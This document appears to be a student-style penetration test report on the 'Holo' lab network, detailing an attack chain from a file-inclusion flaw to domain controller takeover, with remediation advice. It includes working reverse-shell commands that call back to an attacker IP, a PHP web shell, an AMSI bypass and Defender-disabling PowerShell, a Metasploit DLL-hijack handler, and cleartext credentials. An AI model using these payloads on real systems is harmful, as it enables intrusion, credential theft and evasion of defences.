BlackSunSecurity ExternalPenetrationTestReport HOLO v1.2
BlackSunSecurity ExternalPenetrationTestReport HOLO v1.2
HOLOLIVE
v.1.2
Prepared By:
Lai Koon Fatt (Austin)
Black Sun Security
CONFIDENTIALITY Statement
This document is the exclusive property of HOLO and Black Sun Security.
This document contains proprietary and confidential information. Duplication, redistribution, or use,
in whole or in part, in any form, requires consent of both HOLO and Black Sun Security.
Black Sun Security may share this document with auditors under non-disclosure agreements to
demonstrate penetration test requirement compliance.
DISCLAIMERS
The assessments are a “point in time” analysis and as such it is possible that something in the
environment could have changed since the tests reflected in this report were run. Also, it is
possible that new vulnerabilities may have been discovered since the tests were run.
For this reason, this report should be considered a guide, not a 100% representation of the risk
threatening your systems, networks, and applications.
Introduction | Purpose
HOLO has asked Black Sun Security to perform a detailed security examination of their corporate
network (hololive) that contain Active Directory (AD), File Server, Database, and Web Application.
This report is being presented to show the full results of our testing efforts and to make
recommendations where appropriate.
An external penetration test emulates the role of an attacker attempting to gain access to an
internal network without internal resources or inside knowledge.
The scope of this review was limited to a single corporate network given by HOLO - “hololive”.
Assessment Details
Network = 10.200.107.0/24
External Penetration Test
Domain = hololive
Our testing included unauthenticated testing to gain initial foothold/access and perform scanning
and enumeration to identify potential vulnerabilities in hopes of exploitation.
With that, we are pivoting through the network to gain further access eventually gaining access to
Domain Controller (AD/DC).
BLACK SUN SECURITY evaluated HOLO’s external security posture through an external network
penetration test – “grey-box” web application. The focus of this test is to perform attacks, like those
of a hacker and attempt to infiltrate HOLO corporate network – stated in External Penetration Test
Scope.
By leveraging a series of attacks, BLACK SUN SECURITY found two (2) critical, two (2) high and
two (2) medium severity level of vulnerabilities that allowed full internal network access to the
HOLO corporate network.
BLACK SUN SECURITY has classified the level of vulnerabilities based on Severity Classification
section and BLACK SUN SECURITY has compiled Summary of Vulnerabilities for HOLO
references.
It is highly recommended that HOLO address these vulnerabilities as soon as possible as the
vulnerabilities are easily found through basic reconnaissance and exploitable without much effort
(as low-hanging fruits).
These systems as well as a brief description on how access was obtained are listed in the Attack
Summary.
BLACK SUN SECURITY has also included MITRE Adversarial Tactics, Techniques and Common
Knowledge (a.k.a. MITRE ATT&CK Framework) in this Penetration Testing Report. The framework
reference is a curated knowledge base and model for cyber adversary behavior, reflecting the
various phases of an adversary’s attack lifecycle; that will allow HOLO to improve detection of
adversaries in the enterprise and better classify the attacks and assess of organization’s risk.
1 3rd Sept 2021 http://dev.holo.live Obtained user account credential through CWE-22:
Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal') by exploiting Local File
Inclusion vulnerability.
3 5th Sept 2021 http://10.200.107.31 Got in through CWE-640: Weak Password Recovery
Mechanism for Forgotten Password by construct
password reset poisoning to reset password of valid
user account.
4 6th Sept 2021 10.200.107.35 Got in through CWE-427: Uncontrolled Search Path
Element by exploiting vulnerable application found
on the system.
Severity Definition
Vulnerability exists to allow attacker elevated privilege on the system however
Critical
exploitation may require extra steps
High and/or could access system directly. It is advised to form a plan of action and
patch immediately.
Medium configuration. By exploiting these security issues, malicious attackers can access
data on the system.
Low Severity include information leakage, configuration errors and a lack of some
Low security measures. They can be combined with other issues of a higher severity
level and cause a more severe impact on the target.
Summary of Vulnerability
Severity Vulnerability
BLACK SUN SECURITY successfully performs local file inclusion, remote code execution and
upload malicious files to gain access to the system.
Recommendation
• Encourage HOLO to strengthen the input validation for all web application (especially
Hazardous Character) following OWASP Secure Coding Best Practice v2
• If possible, do not permit file paths to be appended directly. Make them hard-coded or selectable
from a limited hard-coded path list via an index variable.
• If you need dynamic path concatenation, ensure you only accept required characters such as "a-
Z0-9" and do not allow ".." or "/" or "%00" (null byte) or any other similar unexpected characters.
• Additional Reference: Code Execution via Local File Inclusion
BLACK SUN SECURITY successfully accesses files that should be restricted access and not
expose to external network and binary with SUID bit eventually escalate privileged to root access.
Recommendation
• Implement strict access control and data protection stated in OWASP Secure Coding Best
Practice v2 to ensure sensitive information is not visible to unauthorized users.
• Impose strict files and directories permission to restrict file access
• Giving least permission for MySQL user to run the service and minimum access permission to
the MySQL
• Remove any binary with SUID bit or at least shall not give any binary with SUID bit permission
• Train employee on its correct use of robots.txt can represent good practice for non-security
reasons
• Do not rely on robots.txt to provide any kind of protection over unauthorized access
• Additional References: PortSwigger - Robots.txt file
During the assessment, BLACK SUN SECURITY performed multiple attacks against login forms
found on the external network. For all logins, unlimited attempts were allowed, which permitted an
eventual successful login on the HOLO admin portal.
Recommendation
• Restrict logon attempts to 3 logon failures
BLACK SUN SECURITY leveraged multiple attacks against HOLO login forms using valid
credentials. The use of multi-factor authentication would have prevented full access and required
BLACK SUN SECURITY to utilize additional attack methods to gain internal network access.
Recommendation
• Integrate multi-factor authentication services
During the assessment, BLACK SUN SECURITY successfully performed DLL injection into one of
the vulnerable applications to escalated privileged as administrator.
Recommendation
• Ensure any service with space enclosed with double quote.
• Remove or ensure all application/software/OS are up to date
During the assessment, BLACK SUN SECURITY successfully performed exploit on SMB session
by abusing NTLM relay that allow to gain access to Domain Controller.
Recommendation
• Enable SMB signing enforcement
Black Sun Security recommend patching the vulnerabilities identified during the testing to ensure
that an attacker cannot exploit these systems in the future. One thing to remember is that these
systems require frequent patching and once patched, should remain on a regular patch program to
protect additional vulnerabilities that are discovered later.
Black Sun Security utilized a widely adopted approach that was also in line with Open Web
Application Security Project (OWASP) to performing penetration testing that is effective in testing
how well the Holo corporate environment are secure.
Below is a breakout of how Black Sun Security was able to identify and exploit the variety of
systems and includes all individual vulnerabilities found.
Information Gathering
The information gathering portion of a penetration test focuses on identifying the scope of the
penetration test.
During this penetration test, Black Sun Security was tasked with exploiting the specific Holo
corporate network that were stated in the External Penetration Test Scope
Based on the given scope of engagement for Holo corporate network (10.200.107.0/24), Black
Sun Security has performed a quick nmap scan to gather information on the available assets.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
perform nmap network scan on 10.200.107.0/24 as listed below:
The service enumeration portion of a penetration test focuses on gathering information about what
services are alive on a system or systems.
This is valuable for an attacker as it provides detailed information on potential attack vectors into a
system.
Understanding what applications are running on the system gives an attacker needed information
before performing the actual penetration test. In some cases, some ports may not be listed.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
perform nmap host scan on target system as listed below:
Penetration
The penetration testing portions of the assessment focus heavily on gaining access to a variety of
systems.
During this penetration test, Black Sun Security was able to successfully gain access to 5 out of 6
systems
Black Sun Security has identified host alive (10.200.107.33) based on the nmap scan result from
Information Gathering and perform a detail rustscan with the rustscan command as shown below.
1. sudo rustscan -u 5000 -b 1900 -t 4000 --tries 2 --scan-order serial -a 10.200.107.33 -- -A -sVC --script=safe,default,discovery,version,vuln |
sudo tee rustscan-full-result-10.200.107.33
1. sudo rustscan -u 5000 -b 1900 -t 4000 --tries 2 --scan-order serial -a 10.200.107.33 -- -A -sVC --
script=safe,default,discovery,version,vuln | sudo tee rustscan-full-result-10.200.107.33
2.
3. .----. .-. .-. .----..---. .----. .---. .--. .-. .-.
4 | {} }| { } |{ { { }{ { / } / {} \ | `| |
From the rustscan result we know the port open of our target system as below:
• TCP: 22, 80, 33060
Web Enumeration
In the meantime, let's fire up gobuster dir search on our target system with the gobuster command
below:
From the rustscan result as well, we have a few details worth to check out:
• robots.txt - however it does not contain useful information
• We got the hostname and domain - holo.live and www.holo.live
Let's add the hostname and domain of our target system into host file on our attacker machine
using command below:
1. sudo sed -i.bak '$a10.200.107.33 holo.live www.holo.live' /etc/hosts && cat /etc/hosts && ls -l /etc/hosts*
We also fire up gobuster vhost scan to check if there is additional sub-domain can be found using
command below:
Seem like we found additional sub-domain available, let's add to our host file on our attacker
machine using command below:
1. sudo sed -i.bak 's/$/ admin.holo.live dev.holo.live/' /etc/hosts && cat /etc/hosts && ls -l /etc/hosts*
2.
From here, we know probably we can retrieve the file by exploiting Local File Inclusion
vulnerability in PHP.
Looking at the source for talent page of dev.holo.live, we have notice there is a possibly of Local
File Inclusion vulnerability – “ img.php?file= ”
This will allow us try to retrieve the “ creds.txt ” as shown below that is stated in “ robots.txt ” of
admin.holo.live as we know development environment usually is a replication of production
environment.
System Affected:
• http://dev.holo.live
Remediation Owner:
• Web Application Developer
• System Owner
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used
on target system as listed below:
Web Enumeration
Once we login, we check on the source of “dashboard.php”, right away we notice there is PHP
Remote Code Execution (OWASP Command Injection) under the section of "visitor visited today"
and Holo developer has written a comment as well.
We are using curl command as shown below to perform this exploit to get our reverse shell:
1. curl http://admin.holo.live/dashboard.php?cmd=nc%20-c%20bash%2010.50.103.20%2018888
2.
System Affected:
• http://admin.holo.live
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used
on target system as listed below:
System Enumeration
Next, we are enumerating through the directories (/var/www/admin – which is the web hosting
directories) on target system as shown below:
User.txt
Since this is a docker container environment, we know that docker often create docker network as
internal network to connect different containers, we decided to check out the network information
from current docker container by using “ifconfig” command (though the “db_connect.php” has
disclosed part of the information).
We then check on the routing information by using “route -nv” command and the result shown
below:
Let's perform a quick port scanning on 192.168.100.1 leveraging the netcat binary available on
current docker container as shown below:
1. for port in {1..20000}; do timeout 2 nc -znv 192.168.100.1 $port 2>&1 | grep open ; done
2.
From the port scanning result, we know that there is mysql service running on 192.168.100.1, we
may use the credential found previously (db_connect.php) to login into mysql server which reside
on 192.168.100.1
We can confirm this by checking if mysql client connection is running on current docker container
by using “ps -elf | grep mysql” command and result as shown below:
1. show databases;
2.
1. use DashboardDB;
2.
• We use “show tables;” to understand what the tables are available on this “DashboardDB”
database and we found a user table, we have dumped the entire user table out as shown
below:
As we have the access to mysql server on 192.168.100.1, we can exploit the mysql server to
escape current docker container and gain access to the host system.
Below are the actions we perform to escape current docker container and gain access to the host
system.
• Create a table named "hacker" under the active database, in this case the active database
is “DashboardDB”, though we can also create our own database, however, to ensure the
access to the host system and being low-profile we going to use current active database.
• Then we use "INSERT" statement to insert our php payload into the table just created.
o PHP Payload as shown in the code snippet below:
1. <?php $cmd=$_GET[“cmd”];system($cmd);?>
• Next, we use "SELECT" statement with "outfile" feature to dump the php payload to a file
• Last, we use "curl" command (curl 192.168.100.1:8080/shell.php?cmd=whoami) to get the
response of our php to ensure our php payload is working properly
We have the php working, we can craft and get reverse shell callback from host system to our
attacker machine.
First, we crafted a reverse shell bash script named "rev.sh" on our local attacker machine, you
may find this reference for reverse shell payload
Here is The Proof-of-Concept Reverse Shell Payload Code used as shown in below code snippet:
1. #!/bin/bash
2. bash -i >& /dev/tcp/10.50.103.20/23333 0>&1
3.
1. python3 -m http.server 80
2.
In the meantime, we also spin up netcat listener to catch the callback from target host system as
shown below with the netcat command shown in the code snippet:
Now, back to our docker container system, using curl to allow 192.168.100.1 get our reverse shell
script and execute it by bash.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
escape docker container environment on target system as listed below:
Right away, we search for binaries with setuid bit using command below:
We notice unusual docker binary with setuid, searching online with the reference of
https://gtfobins.github.io/gtfobins/docker/#suid showing we can exploit such docker binary with
setuid bit to escalate privilege to root.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
escalate privilege to root user on target system as listed below:
First, dumping “/etc/passwd” and “/etc/shadow” as we know passwd and shadow are useful for us
to gain access to the system as well as cracking the password of valid user.
From the “/etc/passwd”, we know that - there is one non-system user --- “linux-admin”
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
dump the “/etc/passwd” and “/etc/shadow” from target system as listed below:
For us to gain persistent access to the system, we have generated sshkey on attacker machine
and copy to target system.
The Proof-of-Concept Payload Code used to generate sshkey and insert to “root” and “linux-
admin” user “authorized_keys” as shown below
Below is the result of insert sshkey created to “root” user account on target system:
We also create additional user just in case and as a secondary source to gain access back to the
system.
The Proof-of-Concept Payload Code used to generate user and change password as below
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
create persistent access on target system as listed below:
Password Cracking
Back to our attacker machine, as we have the shadow file; we can try to crack the password
especially for the user called "linux-admin"
Here is the reference of Project 12: Cracking Linux Password Hashes with Hashcat
The "test2.hccapx" is the hash for "linux-admin" user password from shadow file:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
crack the user password from shadow file as listed below:
However, as from our first nmap result there is no other system available for us. Hence we
decided to ssh back to 10.200.107.33 and we notice there is nmap binary available.
We have utilized nmap from 10.200.107.33 to perform quick scan for host alive by using command
below:
From the nmap network scan result, we know that; there are several systems on the network:
• 10.200.107.31
• 10.200.107.32
• 10.200.107.35
• 10.200.107.30
From the rustscan result we know the port open of our target system as below:
• TCP: 80, 88, 135, 139, 389, 445, 3389
From the rustscan result we know the port open of our target system as below:
• TCP: 22, 80, 135, 139, 443, 445, 3306, 3389
From the rustscan result we know the port open of our target system as below:
• TCP: 135, 139, 445, 3389
From the rustscan result we know the port open of our target system as below:
• TCP: 80, 135, 139, 445, 3389
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
perform nmap network scan on 10.200.107.0/24 and nmap host scan as listed below:
Network Pivoting
Do take a note on all the nmap result, it showing all other systems are Windows.
We have confirmed that on our attacker machine, we are unable access to any host other than
10.200.107.33
With all the information we gathered, we can conclude that Holo designed their corporate network
with segmentation.
We will need to forward our attacker traffic to Holo corporate network leveraging the host system
we gained access which is 10.200.107.33
We decided to use “sshuttle” - a proxy tools utilize ssh to forward our attacker traffic via ssh on
10.200.107.33 to Holo corporate network 10.200.107.0/24
The command we used for sshuttle as below (note that command is executed on our attacker
machine):
Checking “sshuttle” process is running by issue command “sudo ps -elf | grep sshu” as shown
below:
After “sshuttle” is running, we can access to the port 80 which is HTTP service for 10.200.107.31
on our attacker machine.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
access 10.200.107.31 as listed below:
Web Enumeration
As 10.200.107.31 showing login page, we decide to try to log into it using the credentials found
previously (that we dump from the database called "DashboardDB" that is in mysql server on
192.168.100.1).
Take a note of the "Forgot Password" page that we have not explore for now.
From the response of login page, we know that gurag is a valid user.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
check validity of user on 10.200.107.31 as listed below:
Now we try to reset "gurag" password as it is a valid user that allow us login as shown below:
Below are the request and response cookies from the reset password:
From the response cookies, we can retrieve the "user_token" which is a weak password reset
mechanism fall under OWASP - Broken Authentication.
With the "user_token" visible, we are now able to craft a valid password reset link for our targeted
user "gurag"
1. curl http://10.200.107.31/password_reset.php?user=gurag&user_token=input_user_token_here
2.
3.
4. # Example
5. curl
'http://10.200.107.31/password_reset.php?user=gurag&user_token=68d0f48756dc369c1f900efac880c7fc6935badc03adae50d207e85
95f540439721b1af96d6d7efb87d56efa398ebd491859'
And we visit the password reset page again for user "gurag", below is the response that allow us
to input new password for "gurag"
Web Flag
Once we input our new password for the user "gurag" and we get another flag as shown below:
Remediation Owner:
• Web Application Developer
Below is the home page that allow us to upload image after login.
We have check on the "upload.js" JavaScript, below is what we found interesting; basically, it
allows us to upload anything to 10.200.107.31:
With unrestricted file upload, we can craft a reverse shell php and upload to 10.200.107.31 that
will get us access to the system, refer to this link for PHP Reverse Shell
The specific Proof-of-Concept Payload Code used in PHP Reverse Shell as shown in code
snippet below:
Upload to 10.200.107.31 via upload page and it show a successful uploaded message in below:
System Affected:
• 10.200.107.31
Remediation Owner:
• Web Application Developer
• System Owner
We access to the directory found and the reverse shell php is inside.
Next we spin up netcat listener on our attacker machine and using curl command to activate the
php reverse shell we have uploaded to 10.200.107.31
1. curl http://10.200.107.31/images/rev.php
Below is the reverse shell call-back and received on our attacker machine:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
gain reverse shell access on 10.200.107.31 as listed below:
Right away, we know this is a Windows system, and checking basic information as below:
Below is the Proof-of-Concept Payload Code we used for above mentioned tasks.
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
create persistent access on 10.200.107.31 as listed below:
Defense Evasion
As we are working with Windows system, we also using powershell command below to bypass
Windows AMSI, this will allow us to run command or execute tools without trigger Windows Anti-
Malware system.
1. [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String
('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAH
MAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
2.
3. Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
4.
5. Set-MpPreference -DisableRealtimeMonitoring $true
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
bypass Windows AMSI on 10.200.107.31 as listed below:
Root.txt
As we are working on Windows system, we have uploaded most popular tools such as "mimikatz"
to dump 10.200.107.31 system hashes using powershell command below:
Next, we run command below to dump all possible credential information and hashes such as
NTLM via mimikatz.
And right away from mimikatz result, we found clear text credential for one of the user (watamet)
on the system as shown below:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
dump NTLM hash on 10.200.107.31 as listed below:
Lateral Movement
We have tried the credentials found on different system, only 10.200.107.35 is accessible as
shown below:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
access 10.200.107.35 as listed below:
User.txt
As we are using "watamet" user logging in 10.200.107.35 and it does not have local administrator
right on the system, hence unable to execute command require admin privilege.
We decided to use applocker bypass checker (that was downloaded on our attacker machine) to
check if the system has enabled applocker which most Windows system does and get the folder is
accessible without restricted.
We execute powershell command below to download the applocker bypass checker from our
attacker machine:
To be safe, we have download the applocker bypass checker in “C:\Windows\Tasks”, this is the
folder used by Windows Scheduled Task.
Next, we run the following powershell command to start the applocker bypass checker:
1. .\ applocker-bypas-checker.ps1
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
bypass Windows AppLocker on 10.200.107.35 as listed below:
From here, we can confirm that “C:\Windows\Tasks” is safe for us to execute command and tool.
Now, we start to enumerate the system and we found a very interesting application
(kavremover.exe) at “C:\Users\watamet\Applications\” as shown below, which is unusual path for
program.
First we create a malicious DLL that embedded reverse shell meterpreter module form Metasploit
for the vulnerable application using msfvenom on out attacker machine as per below command.
Then we use the same “Invoke-WebRequest” powershell command to download the malicious
DLL from our attacker machine to target system under “C:\Windows\Tasks” as shown below:
Next, we setup the Metasploit multi-handler module on our attacker machine as below:
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST 10.50.103.20
4. set LPORT 16666
5. run -j
6.
To ensure the malicious DLL is loaded, we use command line to start the application and it prompt
error below however, the meterpreter session is established.
System Affected:
• 10.200.107.35
Remediation Owner:
• System Owner
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
perform exploitable of DLL Hijacking on 10.200.107.35 as listed below:
As we are using meterpreter, we need to inject meterpreter process into the system to have better
and stabilize shell access, below is what we done to get a stabilize shell.
First, we need to execute “getsystem” command in meterpreter to temporary escalate our privilege
to “NT-AUTHORITY\SYSTEM”
Next, use “ps” command to get the list of process running on 10.200.107.35 as shown below:
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
gain stabilize shell on 10.200.107.35 as listed below:
Once done, we can execute “shell” command to have command line access on 10.200.107.35
And we perform the same technique to gain persistent access to the system that was done on
10.200.107.31
Besides, we execute command below to check if the system joined domain or any domain user:
And the result show current system 10.200.107.35 is joined HOLOLIVE domain and the domain
server is “DC-SRV01” (alternatively, the mimikatz result show the same)
We decided to attack on “DC-SRV01” domain server – 10.200.107.30 using NTLM relay attack
after researching on possible exploitable on SMB vulnerability.
• An SMB Relay Race – How to Exploit LLMNR and SMB Message Signing for Fun and
Profit
• Remote NTLM Relaying via Meterpreter
• Remote NTLM relaying through meterpreter on Windows port 445
• Execute command below to stop the SMB services on 10.200.107.35, that allow us to
intercept and relay the SMB session from our attacker machine.
1. sc stop netlogon
2. sc stop lanmanserver
3. sc config lanmanserver start= disabled
4. sc stop lanmanworkstation
5. sc config lanmanworkstation start= disabled
6.
NIST - CVE-2016-2115
System Affected:
• 10.200.107.30
Remediation Owner:
• System Owner
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
exploit SMB vulnerability on 10.200.107.30 as listed below:
As we success exploit SMB session with ntlm relay attack, we decided to use the popular tools
from Impacket - smbexec that is downloaded on our attacker machine to gain access to
10.200.107.30 in conjunction with “proxychain”
To use smbexec with proxychain, we have added below line into “/etc/proxychain.conf” on our
attacker machine (we have installed proxychain prior using “sudo apt install -y proxychains”
command on our attacker machine).
Once ready, we execute the following command, it will launch shell access on 10.200.107.30
MITRE ATT&CK Framework References for the tactics and techniques Black Sun Security used to
gain shell access on 10.200.107.30 as listed below:
And we perform the same technique to gain persistent access to the system that was done on
10.200.107.31
We use the Impacket – secretsdump (as alternative method) to dump the NTLM hashes, that was
downloaded on our attacker machine and execute command below to dump NTLM hashes:
With this, we have own the entire Holo corporate network and Holo domain controller.
Side note, we have tried various method to attack 10.200.107.32 however the attack is
unsuccessful.
Maintaining access to a system is important to us as attackers, ensuring that we can get back into
a system after it has been exploited is invaluable.
The maintaining access phase of the penetration test focuses on ensuring that once the focused
attack has occurred, we have administrative access over the system again.
Many exploits may only be exploitable once and we may never be able to get back into a system
after we have already per-formed the exploit.
Black Sun Security added administrator or root level accounts on all systems compromised. In
addition to the administrative/root access, Black Sun Security has added attacker sshkey to all
system compromised that have SSH service running.
House Cleaning
The house cleaning portions of the assessment ensures that remnants of the penetration test are
removed.
Often fragments of tools or user accounts are left on an organizations computer which can cause
security issues down the road. Ensuring that Black Sun Security are meticulous, and no remnants
of our penetration test are left over is important.
After the penetration test were completed, Black Sun Security removed all user accounts,
passwords, malicious files (including reverse shell php file, mimikatz, powershell script and DLL
file), database tables and sshkey installed on the system.
Black Sun Security has ensured all the services that have been turn off or disabled during the
assessment are revert to normal, docker container is up and running (remove leftover container
used for privilege escalation) and any modification of user account group/permission is revert as
well.
HOLO should not have to remove any user accounts or services from the system
HOLO corporate network suffered a series of improper user input validation that led to complete
compromise of internal network in which BLACK SUN SECURITY has successful obtained access
with administrative privileges into four (4) system that were on the HOLO corporate network.
The objectives of this penetration testing were met as BLACK SUN SECURITY has identified and
determined the impact of potential security beach on confidentiality of HOLO corporate data and
internal infrastructure.
It is highly recommended that HOLO take immediate action to patch these vulnerabilities as soon
as possible as the vulnerabilities are easily found through basic reconnaissance and exploitable
without much effort (as low-hanging fruits).
Appendix 1 – References
Vulnerabilities References
• CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
• CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command
Injection')
• CWE-640: Weak Password Recovery Mechanism for Forgotten Password
• CWE-434: Unrestricted Upload of File with Dangerous Type
• CWE-427: Uncontrolled Search Path Element
• NIST - CVE-2016-2115
• Code Execution via Local File Inclusion
• PortSwigger - Robots.txt file
• CWE-23
• CWE-36
• CWE-184
• CWE-182
• NIST - CVE-2020-28950 Detail
• CVE Detail - CVE-2020-28950
• IBM X-Force Exchange - Anti-Ransomware Tool privilege escalation
• CWE-254: 7PK - Security Features (4.5)
• CVE Details - CVE-2016-2115
• Tenable - SMB Signing not required
• Unrestricted File Upload - OWASP
• CWE-428: Unquoted Search Path or Element
Best Practices
• OWASP Secure Coding Best Practice v2
Tool References
• NTLMRelayx
• SMBexec
• secretsdump
• Generate Backdoor via SQL Injection
• https://gtfobins.github.io/gtfobins/docker/#suid
• applocker bypass checker
• PHP Reverse Shell
This appendix 2 – MITRE ATT&CK Framework show the tactics, techniques and sub-techniques
used that can be correlated to the action of BLACK SUN SECURITY performed during this
assessment.
This is extremely useful and acted as a guide for HOLO to plan, engage improvement of detection
capabilities (or early detection) and response to the threats and risks in HOLO corporate
environment.
Tactics
• Tactic - TA0001 - Initial Access
• Tactic – TA0002 - Execution
• Tactic – TA0003 - Persistence
• Tactic – TA0004 - Privilege Escalation
• Tactic – TA0005 – Defense Evasion
• Tactic - TA0006 - Credential Access
• Tactic – TA0007 - Discovery
• Tactic – TA0008 - Lateral Movement
• Tactic – TA0040 - Impact
• Tactic - TA0043 - Reconnaissance
http://10.200 HOLO{bcfe3bcb8e6897018c6
.107.31 3fbec660ff238}
For this assessment, BLACK SUN SECURITY used one (1) Metasploit Meterpreter module on
single target hosts – 10.200.107.35
For this assessment, BLACK SUN SECURITY obtained and leveraging valid user account below:
• admin:DBManagerLogin!
• www-data
• root
• linux-admin
• admin:!123SecureAdminDashboard321!
• gurag
• nt authority\system
• watamet:Nothingtoworry!
• HOLOLIVE/SRV-ADMIN